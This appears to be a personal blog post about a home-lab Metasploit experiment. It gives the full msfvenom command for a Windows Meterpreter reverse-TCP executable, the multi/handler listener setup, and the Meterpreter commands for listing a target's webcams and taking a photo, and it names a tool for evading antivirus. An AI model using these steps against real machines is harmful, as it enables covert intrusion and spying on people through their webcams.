As I mentioned from my previous post(Setting-up a Lab for Metasploit), I was trying to do an experiment whether I could open the webcam of a hacked Windows PC. This article as the title suggests, I will just take a photo from the hacked machine and save it to a local directory which is not far from the original objective of my experiment but I think it is possible to view the live streaming from the webcam which I may explore in the near future but for now, I will just take a photo.
Here's how I was able to do it:
1. The initial process is basically to setup the needed infrastructure for this experiment which I thoroughly documented on my previous post. I encountered several fuzzy problems during the course, at the time I first did the procedure, everything worked just fine but had to stopped it to attend to other tasks and when I repeated the process a few days after, sometimes the target machine and my vbox Kali wont see each other on the network and after a rediculus trial and error by just keep on restarting, deleting the bridge network adapter and bring it up again, maybe around 10x and finally, they can now see each other.
2. The next thing I did was to create the payload which is a .exe file using msfvenom by typing the following at the Terminal Emulator:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=<IP Address> LPORT=<Port Number> -o name.exe
This payload will be uploaded to the target Windows 10 Pc. In my case, I had to save it to a microsd card from my host machine then insert it to my target machine. This .exe file is a virus so I had to disable my firewall and antivirus. There are techniques to hide it and avoid virus detection. One method is to use Shellter. I was not able to perform this step because I could not download it. What this .exe file mainly does is to open a reverse shell once the user of the target machine executes it.
3. I have to run metasploit to listen to the port by typing the following:
msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <IP Address>
set LPORT <Port Number>
run
4. Once the reverse shell was connected, I had to type the following to take a photo from the target machine's webcam and save it locally :
webcam_list - returns the attached webcams on the target machine
webcam_snap -i 1 -v false - takes a photo in jpeg format and saves it to a local directory
And that was it, I was supposed to take a screenshot of each step but as I was writing this post, my Kali crushed, too sad. But it does not really matter, this post serves as a documentation of my experiment.
No comments:
Post a Comment